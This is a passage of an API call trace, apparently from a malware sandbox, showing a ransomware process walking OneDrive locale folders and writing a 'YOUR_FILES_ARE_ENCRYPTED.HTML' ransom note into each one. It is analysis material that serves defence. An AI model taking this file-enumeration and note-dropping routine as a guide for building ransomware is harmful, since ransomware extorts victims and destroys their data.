nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="de", cAlternateFileName="")) returned 1 [0160.398] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de") returned 74 [0160.398] GetProcessHeap () returned 0x270000 [0160.398] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.398] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de" [0160.398] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*" [0160.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.399] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.399] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.399] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.399] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.399] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.399] lstrlenW (lpString=".mui") returned 4 [0160.399] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.399] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.399] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.399] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\de\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\de\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.400] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.402] CloseHandle (hObject=0x5a8) returned 1 [0160.402] GetProcessHeap () returned 0x270000 [0160.403] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.403] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="el", cAlternateFileName="")) returned 1 [0160.403] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el") returned 74 [0160.403] GetProcessHeap () returned 0x270000 [0160.403] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.403] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el" [0160.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*" [0160.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7d0cdf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144a0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.404] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.404] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.404] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.404] lstrlenW (lpString=".mui") returned 4 [0160.404] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.404] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7eafd10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7eafd10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x144a0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.404] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.404] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\el\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\el\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.405] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.410] CloseHandle (hObject=0x5a8) returned 1 [0160.411] GetProcessHeap () returned 0x270000 [0160.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en", cAlternateFileName="")) returned 1 [0160.412] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en") returned 74 [0160.412] GetProcessHeap () returned 0x270000 [0160.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.412] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en" [0160.412] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*" [0160.412] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7eafd10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.414] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.414] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.414] lstrlenW (lpString=".mui") returned 4 [0160.414] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.414] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8078d90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8078d90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x116a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.414] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\en\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.415] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.417] CloseHandle (hObject=0x5a8) returned 1 [0160.418] GetProcessHeap () returned 0x270000 [0160.419] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.419] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-gb", cAlternateFileName="")) returned 1 [0160.419] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb") returned 77 [0160.419] GetProcessHeap () returned 0x270000 [0160.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.419] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb" [0160.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*" [0160.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8078d90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.421] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.421] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.421] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.421] lstrlenW (lpString=".mui") returned 4 [0160.421] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.421] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8326650, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8326650, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x118b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.421] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.421] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\en-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\en-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.422] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.425] CloseHandle (hObject=0x5a8) returned 1 [0160.426] GetProcessHeap () returned 0x270000 [0160.426] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.426] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="es", cAlternateFileName="")) returned 1 [0160.427] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es") returned 74 [0160.427] GetProcessHeap () returned 0x270000 [0160.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.427] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es" [0160.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*" [0160.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\es\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8326650, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa84c9570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa84c9570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.428] FindNextFileW (in: hFindFile=0x42f3280, 